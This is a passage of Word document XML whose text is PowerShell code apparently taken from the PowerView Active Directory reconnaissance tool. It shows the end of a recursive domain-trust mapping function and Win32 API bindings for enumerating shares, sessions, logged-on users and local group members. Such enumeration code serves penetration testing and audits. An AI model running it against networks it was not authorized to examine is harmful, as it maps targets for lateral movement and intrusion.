    <w:p w14:paraId="604EC9A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Domains = New-Object System.Collections.Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B1756" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DDB07E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get the current domain and push it onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CACB3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $CurrentDomain = (Get-NetDomain -Credential $Credential).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE39DFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Domains.push($CurrentDomain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63307036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="544DB323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    while($Domains.Count -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE38A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F3050EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain = $Domains.Pop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DBABD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D11BD4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we haven't seen this domain before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98083E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Domain -and ($Domain.Trim() -ne "") -and (-not $SeenDomains.ContainsKey($Domain))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F810120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314F0DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Enumerating trusts for domain '$Domain'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568DF4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="134B2301" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # mark it as seen in our list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448AA046" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = $SeenDomains.add($Domain, "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15337F24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73A13628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA79193" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get all the trusts for this domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59885D63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($LDAP -or $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F738684" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Trusts = Get-NetDomainTrust -Domain $Domain -LDAP -DomainController $DomainController -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC50D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B62E9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F26DCBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Trusts = Get-NetDomainTrust -Domain $Domain -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EEC568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317E7BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3722505F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Trusts -isnot [System.Array]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A721904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Trusts = @($Trusts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46367363" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F57B00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="317C8744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get any forest trusts, if they exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115E147F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(-not ($LDAP -or $DomainController) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614508FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Trusts += Get-NetForestTrust -Forest $Domain -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30764B8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453CDC7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AE30B03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Trusts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A5201" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Trusts -isnot [System.Array]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099890A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Trusts = @($Trusts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF261E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A21EAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B7F4F2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # enumerate each trust found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D4F01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach ($Trust in $Trusts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CDB83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Trust.SourceName -and $Trust.TargetName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E1E10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $SourceDomain = $Trust.SourceName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF40DC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $TargetDomain = $Trust.TargetName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C05299" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $TrustType = $Trust.TrustType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D74E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $TrustDirection = $Trust.TrustDirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E97F2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $ObjectType = $Trust.PSObject.TypeNames | Where-Object {$_ -match 'PowerView'} | Select-Object -First 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0DE54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="351E1575" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # make sure we process the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E29F448" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Null = $Domains.Push($TargetDomain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D52A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AA800F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # build the nicely-parsable custom output object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A391390" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB05861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'SourceDomain' "$SourceDomain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B2548" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'SourceSID' $Trust.SourceSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11FCCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TargetDomain' "$TargetDomain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BD614" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TargetSID' $Trust.TargetSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0B167" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TrustType' "$TrustType"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D2AB17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$TrustDirection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA4FB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust.PSObject.TypeNames.Add($ObjectType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D03E4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2D355" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A24908" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D899FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77984FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B7ED0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7CC2B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[!] Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F468F17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC506D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D65517" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B37FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF9637" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72628362" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48574AC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC77A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE726D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Expose the Win32API functions and datastructures below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9285F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve"># using PSReflect. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E956F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve"># Warning: Once these are executed, they are baked in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957A3C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># and can't be changed while the script is running!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12321A8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27315B3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85AF44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42A18C75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$Mod = New-InMemoryModule -ModuleName Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A964CA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03078EF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># all of the Win32 API functions we need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54037915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$FunctionDefinitions = @(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24490A0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21136306" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAAFE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCAF8C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6A544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEED34F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D3A9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E8CB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9806E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120D308" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C8FEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A75E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8F91A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45094C69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C53CA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B38FDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A29434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C9265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3328D7C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># enum used by $WTS_SESSION_INFO_1 below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAB1C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B2F9E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Active       =    0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B291DBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Connected    =    1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366657B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ConnectQuery =    2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FCB4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Shadow       =    3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236CB25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Disconnected =    4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C2E8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Idle         =    5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13327E1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Listen       =    6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CDC6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Reset        =    7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55411CC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Down         =    8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA2708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Init         =    9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B839D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768FE86F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09D4E9C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the WTSEnumerateSessionsEx result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48195015" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$WTS_SESSION_INFO_1 = struct $Mod WTS_SESSION_INFO_1 @{</w:t>
      </w:r>
    </w:p>
